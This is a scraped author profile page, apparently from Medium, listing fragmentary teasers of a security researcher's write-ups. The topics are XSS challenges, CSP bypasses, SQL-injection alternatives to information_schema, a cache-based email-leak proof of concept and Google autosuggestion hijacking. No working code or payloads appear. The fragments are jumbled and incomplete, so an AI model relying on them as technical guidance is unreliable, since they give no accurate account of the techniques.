Writeup to Intigriti’s 0621 XSS challenge

against strict CSP policies


Executing arbitrary parentheses-less XSS against strict Content-Security-Policy’ies (CSP)

XSS Challenge

Alternative ways to retrieve table names in MySQL — without information_schema.

  • information_schema
  • “in” and “or” keywords
Full blacklist with examples

Alternatives to information_schema table

Write-up based on “simple” XSS challenge by @terjanq

The challenge

  1. Displaying sanitized by DOMPurify HTML code via ?safe=html_code parameter.
  2. Embedding user’s unsafe code in…

Leaking user’s emails — Proof of Concept

A brief summary of the attack

  1. The attacker controls a malicious website, let’s call it evilwebsite.com
  2. On the malicious evilwebsite.com, the attacker removes a specific resource from the browser cache, e.g. “not found” image

Based on @SecurityMB XSS Challenge

XSS Challenge

If you are familiar with the challenge details and are only interested in knowing the solutions, I recommend scrolling down to the ‘CSP Path bypass’ section.

Task description

and the deceiver of protected.

Quick introduction:

or rather: How I am able to hijack your autosuggestions in Google Search.

Proof of Concept in action


Content-Type: text/html


Security enthusiast that loves playing CTFs and hunting for bugs in the wild. Also likes to do some chess once in a while. twitter.com/terjanq

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store